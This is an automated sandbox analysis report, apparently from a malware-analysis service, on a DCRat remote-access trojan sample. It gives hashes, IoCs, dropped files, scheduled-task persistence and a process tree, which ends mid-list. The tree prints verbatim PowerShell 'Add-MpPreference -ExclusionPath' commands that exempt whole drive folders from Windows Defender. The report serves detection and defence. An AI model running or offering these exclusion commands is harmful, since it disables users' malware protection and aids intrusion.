dcrat | c50aeeef5c7a0dcbafb2da4b7fa5b983a09fb2e8a84b75072ec7d88457e71826

Analysis

max time kernel
156s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
12-12-2022 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe
Size

2.0MB
MD5

fc9ea28a3c3659c4200e442d20198458
SHA1

79ede873cd08d5941e54524dd85b5add0a79bd7c
SHA256

51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0
SHA512

c2357a0eb6fd31929af57c544be2de14b0daee2a731ec09e586b0ac748b7368ae5a022d0d8dae0ccece0fa860799a0da02405f60d86a963e177508b5e4220a17
SSDEEP

49152:ubA3jVKbYcU6bWUfj4a7syRO2tzK/RNS/2t:ubjJXj4a4IKJYet

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 60 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	984	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	692	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1868	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2404	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2440	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2804	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2840	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2928	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2948	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2992	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3064	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1264	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	596	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2196	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	284	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1240	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	1352	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2804	1352	schtasks.exe	32

DCRat payload 25 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/files/0x00080000000122f1-60.dat	dcrat
behavioral1/files/0x00080000000122f1-64.dat	dcrat
behavioral1/files/0x00080000000122f1-62.dat	dcrat
behavioral1/files/0x00080000000122f1-61.dat	dcrat
behavioral1/memory/1588-65-0x0000000000AD0000-0x0000000000C90000-memory.dmp	dcrat
behavioral1/files/0x00080000000122f1-126.dat	dcrat
behavioral1/memory/2224-127-0x0000000001340000-0x0000000001500000-memory.dmp	dcrat
behavioral1/files/0x000d0000000122e7-205.dat	dcrat
behavioral1/files/0x000d0000000122e7-212.dat	dcrat
behavioral1/files/0x000d0000000122e7-213.dat	dcrat
behavioral1/files/0x000d0000000122e7-217.dat	dcrat
behavioral1/files/0x000d0000000122e7-216.dat	dcrat
behavioral1/memory/2604-210-0x0000000000E80000-0x0000000001040000-memory.dmp	dcrat
behavioral1/files/0x000d0000000122e7-220.dat	dcrat
behavioral1/files/0x000d0000000122e7-221.dat	dcrat
behavioral1/files/0x000d0000000122e7-208.dat	dcrat
behavioral1/files/0x000d0000000122e7-224.dat	dcrat
behavioral1/files/0x000d0000000122e7-225.dat	dcrat
behavioral1/files/0x000d0000000122e7-207.dat	dcrat
behavioral1/files/0x000d0000000122e7-229.dat	dcrat
behavioral1/files/0x000d0000000122e7-228.dat	dcrat
behavioral1/files/0x000d0000000122e7-230.dat	dcrat
behavioral1/memory/864-234-0x0000000000050000-0x0000000000210000-memory.dmp	dcrat
behavioral1/files/0x000800000001449e-233.dat	dcrat
behavioral1/files/0x000800000001449e-232.dat	dcrat

Drops file in Drivers directory 1 IoCs

Processes:

SurrogateDll.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SurrogateDll.exe

Executes dropped EXE 16 IoCs

Processes:

pid	Process
1588	SurrogateDll.exe
2224	SurrogateDll.exe
2756	powershell.exe
2604	powershell.exe
2876	powershell.exe
2832	powershell.exe
2928	powershell.exe
2884	powershell.exe
3052	powershell.exe
3028	powershell.exe
1980	powershell.exe
3068	powershell.exe
1472	powershell.exe
2116	powershell.exe
748	powershell.exe
864	conhost.exe

Loads dropped DLL 2 IoCs

Processes:

cmd.exe

pid	Process
1336	cmd.exe
1336	cmd.exe

Drops file in System32 directory 5 IoCs

Processes:

SurrogateDll.exe

description	ioc	Process
File created	C:\Windows\System32\ias\spoolsv.exe	SurrogateDll.exe
File created	C:\Windows\System32\ias\f3b6ecef712a24	SurrogateDll.exe
File opened for modification	C:\Windows\System32\ias\RCX5114.tmp	SurrogateDll.exe
File opened for modification	C:\Windows\System32\ias\RCX547E.tmp	SurrogateDll.exe
File opened for modification	C:\Windows\System32\ias\spoolsv.exe	SurrogateDll.exe

Drops file in Program Files directory 19 IoCs

Processes:

SurrogateDll.exeSurrogateDll.exe

description	ioc	Process
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\RCX3CD6.tmp	SurrogateDll.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\DAO\7a0fd90576e088	SurrogateDll.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\powershell.exe	SurrogateDll.exe
File opened for modification	C:\Program Files\7-Zip\Lang\conhost.exe	SurrogateDll.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\0a1fd5f707cd16	SurrogateDll.exe
File created	C:\Program Files\Windows Journal\en-US\winlogon.exe	SurrogateDll.exe
File created	C:\Program Files\Windows Journal\en-US\cc11b995f2a76d	SurrogateDll.exe
File opened for modification	C:\Program Files\Windows Journal\en-US\RCX6053.tmp	SurrogateDll.exe
File created	C:\Program Files\7-Zip\Lang\088424020bedd6	SurrogateDll.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\DAO\explorer.exe	SurrogateDll.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\sppsvc.exe	SurrogateDll.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\sppsvc.exe	SurrogateDll.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\RCX395B.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files\Windows Journal\en-US\RCX5CE8.tmp	SurrogateDll.exe
File opened for modification	C:\Program Files\Windows Journal\en-US\winlogon.exe	SurrogateDll.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\DAO\explorer.exe	SurrogateDll.exe
File created	C:\Program Files (x86)\Internet Explorer\en-US\e978f868350d50	SurrogateDll.exe
File created	C:\Program Files\7-Zip\Lang\conhost.exe	SurrogateDll.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\en-US\powershell.exe	SurrogateDll.exe

Drops file in Windows directory 6 IoCs

Processes:

SurrogateDll.exe

description	ioc	Process
File created	C:\Windows\Setup\State\conhost.exe	SurrogateDll.exe
File created	C:\Windows\Setup\State\088424020bedd6	SurrogateDll.exe
File opened for modification	C:\Windows\Vss\Writers\System\conhost.exe	SurrogateDll.exe
File opened for modification	C:\Windows\Setup\State\conhost.exe	SurrogateDll.exe
File created	C:\Windows\Vss\Writers\System\conhost.exe	SurrogateDll.exe
File created	C:\Windows\Vss\Writers\System\088424020bedd6	SurrogateDll.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 60 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	Process
984	schtasks.exe
1868	schtasks.exe
2760	schtasks.exe
2992	schtasks.exe
1924	schtasks.exe
2024	schtasks.exe
2324	schtasks.exe
3012	schtasks.exe
596	schtasks.exe
1688	schtasks.exe
2004	schtasks.exe
1844	schtasks.exe
2736	schtasks.exe
2780	schtasks.exe
284	schtasks.exe
1064	schtasks.exe
2880	schtasks.exe
2948	schtasks.exe
1264	schtasks.exe
2404	schtasks.exe
2804	schtasks.exe
692	schtasks.exe
2376	schtasks.exe
3064	schtasks.exe
1944	schtasks.exe
2788	schtasks.exe
2516	schtasks.exe
1620	schtasks.exe
2196	schtasks.exe
2128	schtasks.exe
1712	schtasks.exe
1756	schtasks.exe
1644	schtasks.exe
2332	schtasks.exe
1408	schtasks.exe
2692	schtasks.exe
2968	schtasks.exe
3040	schtasks.exe
1684	schtasks.exe
1992	schtasks.exe
556	schtasks.exe
2656	schtasks.exe
2440	schtasks.exe
2584	schtasks.exe
2908	schtasks.exe
2804	schtasks.exe
2840	schtasks.exe
2928	schtasks.exe
2312	schtasks.exe
2344	schtasks.exe
2684	schtasks.exe
1320	schtasks.exe
2476	schtasks.exe
2716	schtasks.exe
1240	schtasks.exe
1084	schtasks.exe
908	schtasks.exe
1560	schtasks.exe
2664	schtasks.exe
2792	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

SurrogateDll.exeSurrogateDll.exe

pid	Process
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
1588	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe
2224	SurrogateDll.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

SurrogateDll.exeSurrogateDll.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

description	pid	Process
Token: SeDebugPrivilege	1588	SurrogateDll.exe
Token: SeDebugPrivilege	2224	SurrogateDll.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	864	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exeWScript.execmd.exeSurrogateDll.execmd.exeSurrogateDll.exe

description	pid	Process	procid_target
PID 1832 wrote to memory of 996	1832	51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe	28
PID 1832 wrote to memory of 996	1832	51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe	28
PID 1832 wrote to memory of 996	1832	51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe	28
PID 1832 wrote to memory of 996	1832	51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe	28
PID 996 wrote to memory of 1336	996	WScript.exe	29
PID 996 wrote to memory of 1336	996	WScript.exe	29
PID 996 wrote to memory of 1336	996	WScript.exe	29
PID 996 wrote to memory of 1336	996	WScript.exe	29
PID 1336 wrote to memory of 1588	1336	cmd.exe	31
PID 1336 wrote to memory of 1588	1336	cmd.exe	31
PID 1336 wrote to memory of 1588	1336	cmd.exe	31
PID 1336 wrote to memory of 1588	1336	cmd.exe	31
PID 1588 wrote to memory of 1532	1588	SurrogateDll.exe	48
PID 1588 wrote to memory of 1532	1588	SurrogateDll.exe	48
PID 1588 wrote to memory of 1532	1588	SurrogateDll.exe	48
PID 1588 wrote to memory of 1780	1588	SurrogateDll.exe	49
PID 1588 wrote to memory of 1780	1588	SurrogateDll.exe	49
PID 1588 wrote to memory of 1780	1588	SurrogateDll.exe	49
PID 1588 wrote to memory of 1512	1588	SurrogateDll.exe	50
PID 1588 wrote to memory of 1512	1588	SurrogateDll.exe	50
PID 1588 wrote to memory of 1512	1588	SurrogateDll.exe	50
PID 1588 wrote to memory of 1676	1588	SurrogateDll.exe	52
PID 1588 wrote to memory of 1676	1588	SurrogateDll.exe	52
PID 1588 wrote to memory of 1676	1588	SurrogateDll.exe	52
PID 1588 wrote to memory of 1796	1588	SurrogateDll.exe	54
PID 1588 wrote to memory of 1796	1588	SurrogateDll.exe	54
PID 1588 wrote to memory of 1796	1588	SurrogateDll.exe	54
PID 1588 wrote to memory of 1380	1588	SurrogateDll.exe	56
PID 1588 wrote to memory of 1380	1588	SurrogateDll.exe	56
PID 1588 wrote to memory of 1380	1588	SurrogateDll.exe	56
PID 1588 wrote to memory of 772	1588	SurrogateDll.exe	58
PID 1588 wrote to memory of 772	1588	SurrogateDll.exe	58
PID 1588 wrote to memory of 772	1588	SurrogateDll.exe	58
PID 1588 wrote to memory of 112	1588	SurrogateDll.exe	60
PID 1588 wrote to memory of 112	1588	SurrogateDll.exe	60
PID 1588 wrote to memory of 112	1588	SurrogateDll.exe	60
PID 1588 wrote to memory of 1456	1588	SurrogateDll.exe	63
PID 1588 wrote to memory of 1456	1588	SurrogateDll.exe	63
PID 1588 wrote to memory of 1456	1588	SurrogateDll.exe	63
PID 1588 wrote to memory of 1012	1588	SurrogateDll.exe	64
PID 1588 wrote to memory of 1012	1588	SurrogateDll.exe	64
PID 1588 wrote to memory of 1012	1588	SurrogateDll.exe	64
PID 1588 wrote to memory of 1872	1588	SurrogateDll.exe	66
PID 1588 wrote to memory of 1872	1588	SurrogateDll.exe	66
PID 1588 wrote to memory of 1872	1588	SurrogateDll.exe	66
PID 1588 wrote to memory of 1992	1588	SurrogateDll.exe	68
PID 1588 wrote to memory of 1992	1588	SurrogateDll.exe	68
PID 1588 wrote to memory of 1992	1588	SurrogateDll.exe	68
PID 1588 wrote to memory of 908	1588	SurrogateDll.exe	69
PID 1588 wrote to memory of 908	1588	SurrogateDll.exe	69
PID 1588 wrote to memory of 908	1588	SurrogateDll.exe	69
PID 1588 wrote to memory of 1472	1588	SurrogateDll.exe	71
PID 1588 wrote to memory of 1472	1588	SurrogateDll.exe	71
PID 1588 wrote to memory of 1472	1588	SurrogateDll.exe	71
PID 1472 wrote to memory of 2200	1472	cmd.exe	73
PID 1472 wrote to memory of 2200	1472	cmd.exe	73
PID 1472 wrote to memory of 2200	1472	cmd.exe	73
PID 1472 wrote to memory of 2224	1472	cmd.exe	77
PID 1472 wrote to memory of 2224	1472	cmd.exe	77
PID 1472 wrote to memory of 2224	1472	cmd.exe	77
PID 2224 wrote to memory of 2756	2224	SurrogateDll.exe	123
PID 2224 wrote to memory of 2756	2224	SurrogateDll.exe	123
PID 2224 wrote to memory of 2756	2224	SurrogateDll.exe	123
PID 2224 wrote to memory of 2604	2224	SurrogateDll.exe	124

C:\Users\Admin\AppData\Local\Temp\51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe
"C:\Users\Admin\AppData\Local\Temp\51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:996
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\agentBrowsersavesRefBroker\DYj6G9.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\agentBrowsersavesRefBroker\SurrogateDll.exe
      "C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
        5⤵
        
        PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KeWzk8OD4y.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1472
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:2200
      - C:\agentBrowsersavesRefBroker\SurrogateDll.exe
        
        "C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2224
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3028
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
